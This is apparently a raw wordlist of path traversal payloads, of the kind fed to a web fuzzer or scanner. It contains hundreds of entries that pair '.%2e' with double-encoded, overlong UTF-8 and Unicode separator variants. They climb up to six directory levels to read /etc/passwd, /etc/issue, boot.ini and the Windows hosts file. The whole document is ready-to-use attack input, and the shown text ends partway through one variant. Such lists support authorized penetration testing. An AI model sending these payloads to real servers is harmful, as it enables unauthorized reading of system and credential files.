-.%2e%255cetc%255cissue -.%2e%255cboot.ini -.%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.%2e%255c.%2e%255cetc%255cpasswd -.%2e%255c.%2e%255cetc%255cissue -.%2e%255c.%2e%255cboot.ini -.%2e%255c.%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.%2e%255c.%2e%255c.%2e%255cetc%255cpasswd -.%2e%255c.%2e%255c.%2e%255cetc%255cissue -.%2e%255c.%2e%255c.%2e%255cboot.ini -.%2e%255c.%2e%255c.%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.%2e%255c.%2e%255c.%2e%255c.%2e%255cetc%255cpasswd -.%2e%255c.%2e%255c.%2e%255c.%2e%255cetc%255cissue -.%2e%255c.%2e%255c.%2e%255c.%2e%255cboot.ini -.%2e%255c.%2e%255c.%2e%255c.%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255cetc%255cpasswd -.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255cetc%255cissue -.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255cboot.ini -.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255cetc%255cpasswd -.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255cetc%255cissue -.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255cboot.ini -.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255c.%2e%255cwindows%255csystem32%255cdrivers%255cetc%255chosts -.%2e%c0%2fetc%c0%2fpasswd -.%2e%c0%2fetc%c0%2fissue -.%2e%c0%2fboot.ini -.%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.%2e%c0%2f.%2e%c0%2fetc%c0%2fpasswd -.%2e%c0%2f.%2e%c0%2fetc%c0%2fissue -.%2e%c0%2f.%2e%c0%2fboot.ini -.%2e%c0%2f.%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fetc%c0%2fpasswd -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fetc%c0%2fissue -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fboot.ini -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fetc%c0%2fpasswd -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fetc%c0%2fissue -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fboot.ini -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fetc%c0%2fpasswd -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fetc%c0%2fissue -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fboot.ini -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fetc%c0%2fpasswd -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fetc%c0%2fissue -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fboot.ini -.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2f.%2e%c0%2fwindows%c0%2fsystem32%c0%2fdrivers%c0%2fetc%c0%2fhosts -.%2e%c0%afetc%c0%afpasswd -.%2e%c0%afetc%c0%afissue -.%2e%c0%afboot.ini -.%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.%2e%c0%af.%2e%c0%afetc%c0%afpasswd -.%2e%c0%af.%2e%c0%afetc%c0%afissue -.%2e%c0%af.%2e%c0%afboot.ini -.%2e%c0%af.%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.%2e%c0%af.%2e%c0%af.%2e%c0%afetc%c0%afpasswd -.%2e%c0%af.%2e%c0%af.%2e%c0%afetc%c0%afissue -.%2e%c0%af.%2e%c0%af.%2e%c0%afboot.ini -.%2e%c0%af.%2e%c0%af.%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afetc%c0%afpasswd -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afetc%c0%afissue -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afboot.ini -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afetc%c0%afpasswd -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afetc%c0%afissue -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afboot.ini -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afetc%c0%afpasswd -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afetc%c0%afissue -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afboot.ini -.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%af.%2e%c0%afwindows%c0%afsystem32%c0%afdrivers%c0%afetc%c0%afhosts -.%2e%c0%5cetc%c0%5cpasswd -.%2e%c0%5cetc%c0%5cissue -.%2e%c0%5cboot.ini -.%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.%2e%c0%5c.%2e%c0%5cetc%c0%5cpasswd -.%2e%c0%5c.%2e%c0%5cetc%c0%5cissue -.%2e%c0%5c.%2e%c0%5cboot.ini -.%2e%c0%5c.%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cetc%c0%5cpasswd -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cetc%c0%5cissue -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cboot.ini -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cetc%c0%5cpasswd -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cetc%c0%5cissue -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cboot.ini -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cetc%c0%5cpasswd -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cetc%c0%5cissue -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cboot.ini -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cetc%c0%5cpasswd -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cetc%c0%5cissue -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cboot.ini -.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5c.%2e%c0%5cwindows%c0%5csystem32%c0%5cdrivers%c0%5cetc%c0%5chosts -.%2e%c1%9cetc%c1%9cpasswd -.%2e%c1%9cetc%c1%9cissue -.%2e%c1%9cboot.ini -.%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.%2e%c1%9c.%2e%c1%9cetc%c1%9cpasswd -.%2e%c1%9c.%2e%c1%9cetc%c1%9cissue -.%2e%c1%9c.%2e%c1%9cboot.ini -.%2e%c1%9c.%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cetc%c1%9cpasswd -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cetc%c1%9cissue -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cboot.ini -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cetc%c1%9cpasswd -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cetc%c1%9cissue -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cboot.ini -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cetc%c1%9cpasswd -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cetc%c1%9cissue -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cboot.ini -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cetc%c1%9cpasswd -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cetc%c1%9cissue -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cboot.ini -.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9c.%2e%c1%9cwindows%c1%9csystem32%c1%9cdrivers%c1%9cetc%c1%9chosts -.%2e%c1%pcetc%c1%pcpasswd -.%2e%c1%pcetc%c1%pcissue -.%2e%c1%pcboot.ini -.%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.%2e%c1%pc.%2e%c1%pcetc%c1%pcpasswd -.%2e%c1%pc.%2e%c1%pcetc%c1%pcissue -.%2e%c1%pc.%2e%c1%pcboot.ini -.%2e%c1%pc.%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcetc%c1%pcpasswd -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcetc%c1%pcissue -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcboot.ini -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcetc%c1%pcpasswd -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcetc%c1%pcissue -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcboot.ini -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcetc%c1%pcpasswd -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcetc%c1%pcissue -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcboot.ini -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcetc%c1%pcpasswd -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcetc%c1%pcissue -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcboot.ini -.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pc.%2e%c1%pcwindows%c1%pcsystem32%c1%pcdrivers%c1%pcetc%c1%pchosts -.%2e%c0%9vetc%c0%9vpasswd -.%2e%c0%9vetc%c0%9vissue -.%2e%c0%9vboot.ini -.%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.%2e%c0%9v.%2e%c0%9vetc%c0%9vpasswd -.%2e%c0%9v.%2e%c0%9vetc%c0%9vissue -.%2e%c0%9v.%2e%c0%9vboot.ini -.%2e%c0%9v.%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vetc%c0%9vpasswd -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vetc%c0%9vissue -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vboot.ini -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vetc%c0%9vpasswd -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vetc%c0%9vissue -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vboot.ini -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vetc%c0%9vpasswd -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vetc%c0%9vissue -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vboot.ini -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vetc%c0%9vpasswd -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vetc%c0%9vissue -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vboot.ini -.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9v.%2e%c0%9vwindows%c0%9vsystem32%c0%9vdrivers%c0%9vetc%c0%9vhosts -.%2e%c0%qfetc%c0%qfpasswd -.%2e%c0%qfetc%c0%qfissue -.%2e%c0%qfboot.ini -.%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.%2e%c0%qf.%2e%c0%qfetc%c0%qfpasswd -.%2e%c0%qf.%2e%c0%qfetc%c0%qfissue -.%2e%c0%qf.%2e%c0%qfboot.ini -.%2e%c0%qf.%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfetc%c0%qfpasswd -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfetc%c0%qfissue -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfboot.ini -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfetc%c0%qfpasswd -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfetc%c0%qfissue -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfboot.ini -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfetc%c0%qfpasswd -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfetc%c0%qfissue -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfboot.ini -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfetc%c0%qfpasswd -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfetc%c0%qfissue -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfboot.ini -.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qf.%2e%c0%qfwindows%c0%qfsystem32%c0%qfdrivers%c0%qfetc%c0%qfhosts -.%2e%c1%8setc%c1%8spasswd -.%2e%c1%8setc%c1%8sissue -.%2e%c1%8sboot.ini -.%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%2e%c1%8s.%2e%c1%8setc%c1%8spasswd -.%2e%c1%8s.%2e%c1%8setc%c1%8sissue -.%2e%c1%8s.%2e%c1%8sboot.ini -.%2e%c1%8s.%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8setc%c1%8spasswd -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8setc%c1%8sissue -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8sboot.ini -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8setc%c1%8spasswd -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8setc%c1%8sissue -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8sboot.ini -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8setc%c1%8spasswd -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8setc%c1%8sissue -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8sboot.ini -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8setc%c1%8spasswd -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8setc%c1%8sissue -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8sboot.ini -.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8s.%2e%c1%8swindows%c1%8ssystem32%c1%8sdrivers%c1%8setc%c1%8shosts -.%2e%c1%1cetc%c1%1cpasswd -.%2e%c1%1cetc%c1%1cissue -.%2e%c1%1cboot.ini -.%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%2e%c1%1c.%2e%c1%1cetc%c1%1cpasswd -.%2e%c1%1c.%2e%c1%1cetc%c1%1cissue -.%2e%c1%1c.%2e%c1%1cboot.ini -.%2e%c1%1c.%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cetc%c1%1cpasswd -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cetc%c1%1cissue -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cboot.ini -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cetc%c1%1cpasswd -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cetc%c1%1cissue -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cboot.ini -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cetc%c1%1cpasswd -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cetc%c1%1cissue -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cboot.ini -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cetc%c1%1cpasswd -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cetc%c1%1cissue -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cboot.ini -.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1c.%2e%c1%1cwindows%c1%1csystem32%c1%1cdrivers%c1%1cetc%c1%1chosts -.%2e%c1%afetc%c1%afpasswd -.%2e%c1%afetc%c1%afissue -.%2e%c1%afboot.ini -.%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%2e%c1%af.%2e%c1%afetc%c1%afpasswd -.%2e%c1%af.%2e%c1%afetc%c1%afissue -.%2e%c1%af.%2e%c1%afboot.ini -.%2e%c1%af.%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%2e%c1%af.%2e%c1%af.%2e%c1%afetc%c1%afpasswd -.%2e%c1%af.%2e%c1%af.%2e%c1%afetc%c1%afissue -.%2e%c1%af.%2e%c1%af.%2e%c1%afboot.ini -.%2e%c1%af.%2e%c1%af.%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afetc%c1%afpasswd -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afetc%c1%afissue -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afboot.ini -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afetc%c1%afpasswd -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afetc%c1%afissue -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afboot.ini -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afetc%c1%afpasswd -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afetc%c1%afissue -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afboot.ini -.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%af.%2e%c1%afwindows%c1%afsystem32%c1%afdrivers%c1%afetc%c1%afhosts -.%2e%bg%qfetc%bg%qfpasswd -.%2e%bg%qfetc%bg%qfissue -.%2e%bg%qfboot.ini -.%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%2e%bg%qf.%2e%bg%qfetc%bg%qfpasswd -.%2e%bg%qf.%2e%bg%qfetc%bg%qfissue -.%2e%bg%qf.%2e%bg%qfboot.ini -.%2e%bg%qf.%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfetc%bg%qfpasswd -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfetc%bg%qfissue -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfboot.ini -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfetc%bg%qfpasswd -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfetc%bg%qfissue -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfboot.ini -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfetc%bg%qfpasswd -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfetc%bg%qfissue -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfboot.ini -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfetc%bg%qfpasswd -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfetc%bg%qfissue -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfboot.ini -.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qf.%2e%bg%qfwindows%bg%qfsystem32%bg%qfdrivers%bg%qfetc%bg%qfhosts -.%2e%u2215etc%u2215passwd -.%2e%u2215etc%u2215issue -.%2e%u2215boot.ini -.%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%2e%u2215.%2e%u2215etc%u2215passwd -.%2e%u2215.%2e%u2215etc%u2215issue -.%2e%u2215.%2e%u2215boot.ini -.%2e%u2215.%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%2e%u2215.%2e%u2215.%2e%u2215etc%u2215passwd -.%2e%u2215.%2e%u2215.%2e%u2215etc%u2215issue -.%2e%u2215.%2e%u2215.%2e%u2215boot.ini -.%2e%u2215.%2e%u2215.%2e%u2215windows%u2215system32%u2215drivers%u2215etc%u2215hosts -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215etc%u2215passwd -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215etc%u2215issue -.%2e%u2215.%2e%u2215.%2e%u2215.%2e%u2215boot.ini 